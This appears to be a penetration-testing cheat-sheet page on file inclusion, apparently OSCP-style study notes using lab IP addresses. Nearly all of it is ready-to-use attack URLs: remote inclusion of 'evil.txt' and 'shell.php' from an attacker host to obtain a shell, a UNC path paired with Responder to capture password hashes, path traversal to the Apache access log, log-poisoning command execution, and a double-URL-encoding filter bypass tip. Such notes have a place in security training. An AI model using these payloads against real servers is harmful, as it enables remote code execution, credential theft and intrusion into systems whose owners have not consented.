File Inclusion

Remote File Inclusion

http://10.11.0.22/menu.php?file=http://10.11.0.4/evil.txt

Try capture hashes depending on what it's running:

http://10.11.0.22/menu.php?file=//10.10.14.92/test

and listen on responder:

Responder -I tun0

OR

try catch a shell:

http://10.11.0.22/menu.php?file=http://10.11.0.4/shell.php

Local File Inclusion

http://10.11.0.22/../../../../../../../../../../xampp/apache/logs/access.log

http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig

Try double URL encrypt to bypass protections

PreviousWebSocketNextBrute forcing

Last updated